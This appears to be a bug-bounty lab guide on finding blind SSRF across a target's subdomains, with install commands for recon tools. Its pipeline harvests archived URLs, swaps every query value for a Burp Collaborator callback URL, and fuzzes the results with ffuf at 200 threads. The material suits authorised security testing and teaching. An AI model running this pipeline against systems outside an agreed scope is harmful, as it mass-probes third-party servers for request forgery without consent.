# Finding SSRF (wide scope)

The goal of this lab is to enumerate all subdomains of a target domain, gather every known URL and parameter for them, and then detect blind SSRF by replacing parameter values with a Burp Collaborator payload and watching for callbacks.

## Tools

[**subfinder**](https://github.com/projectdiscovery/subfinder) - subdomain discovery.

How to install it:

```
go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest
```

[**qsreplace**](https://github.com/tomnomnom/qsreplace) - Accept URLs on stdin, replace all query string values with a user-supplied value.

How to install it:

```
go install github.com/tomnomnom/qsreplace@latest
```

[**gau**](https://github.com/lc/gau)**:** Fetch known URLs from AlienVault's Open Threat Exchange, the Wayback Machine, and Common Crawl.

How to install it:

```
go install github.com/lc/gau/v2/cmd/gau@latest
```

[**waybackurls**](https://github.com/tomnomnom/waybackurls)**:** Fetch all the URLs that the Wayback Machine knows about for a domain.

How to install it:

```
go install github.com/tomnomnom/waybackurls@latest
```

[**gf**](https://github.com/tomnomnom/gf)**:** A wrapper around grep, to help you grep for things.

How to install it:

```
go install github.com/tomnomnom/gf@latest
```

Filter chain to exclude static assets from the URL list; the final `grep` keeps only the lines that contain the Collaborator payload:

```
grep -v "\.css?ver" | grep -v "\.js" | grep -v "\.png" | grep -v "\.woff" | grep "collaborator"
```
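As a quick self-contained illustration (the URLs below are made up for the demo), the chain drops static assets and keeps only payload-bearing lines:

```shell
# Hypothetical URL list: two static assets, one URL carrying a
# Collaborator payload, and one unrelated page.
printf '%s\n' \
  'https://example.com/style.css?ver=2' \
  'https://example.com/app.js' \
  'https://example.com/api?url=http://x.burpcollaborator.net' \
  'https://example.com/about' |
grep -v "\.css?ver" | grep -v "\.js" | grep -v "\.png" | grep -v "\.woff" | grep "collaborator"
# Only the Collaborator-bearing URL survives the filter.
```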

[**ffuf**](https://github.com/ffuf/ffuf)**:** Fast web fuzzer written in Go.

How to install it:

```
go install github.com/ffuf/ffuf/v2@latest
```

## Scope

```
In Scope: *.example.com
```

## Harvester

```
(gau -subs example.com; subfinder -d example.com -silent | waybackurls) | sort -u > output.txt
```
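Grouping the two commands in parentheses before the final `sort -u` matters: without it, gau's output goes to the terminal and only the subfinder/waybackurls stream reaches `output.txt`. A self-contained sketch of the pattern, with `printf` functions standing in for the real tools (all URLs here are hypothetical):

```shell
# Stand-ins for the two URL sources used in the harvester step.
gau_out() { printf '%s\n' 'https://a.example.com/?q=1' 'https://b.example.com/login'; }
wayback_out() { printf '%s\n' 'https://b.example.com/login' 'https://c.example.com/img'; }

# Group both sources so a single sort -u deduplicates the merged stream.
(gau_out; wayback_out) | sort -u > output.txt
wc -l < output.txt   # 3 unique URLs (the duplicate /login collapses)
```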

## Replacing params

```
cat output.txt | qsreplace "http://xxxxxxxxxxx.burpcollaborator.net" >> fuzz_list.txt
```
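To see what this step does to each line — approximated here with `sed` so the demo runs without qsreplace installed (the real tool also deduplicates and handles query-string edge cases, so prefer it in practice):

```shell
# Rough sed approximation of qsreplace: swap every query value
# for the Collaborator payload.
echo 'https://example.com/load?file=a.txt&cb=https://cdn.example.com' |
sed -E 's|=[^&]*|=http://xxxxxxxxxxx.burpcollaborator.net|g'
# -> https://example.com/load?file=http://xxxxxxxxxxx.burpcollaborator.net&cb=http://xxxxxxxxxxx.burpcollaborator.net
```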

## Fuzzing and testing

```
ffuf -c -w fuzz_list.txt -u FUZZ -t 200 -r
```
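Because `fuzz_list.txt` is built from scraped data, it can contain junk lines that waste requests. An optional sanity filter before handing the list to ffuf — a simple grep sketch with made-up sample lines:

```shell
# Keep only well-formed http(s) URLs; drop anything else.
printf '%s\n' \
  'https://example.com/?u=http://xxxxxxxxxxx.burpcollaborator.net' \
  'garbage-line' \
  'http://example.com/redirect?next=http://xxxxxxxxxxx.burpcollaborator.net' |
grep -E '^https?://' > fuzz_list_clean.txt
wc -l < fuzz_list_clean.txt   # 2
```

Then fuzz the cleaned list the same way: `ffuf -c -w fuzz_list_clean.txt -u FUZZ -t 200 -r`.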

## Resources

To collect all URLs from several sources:

{% embed url="https://github.com/signedsecurity/sigurlfind3r" %}
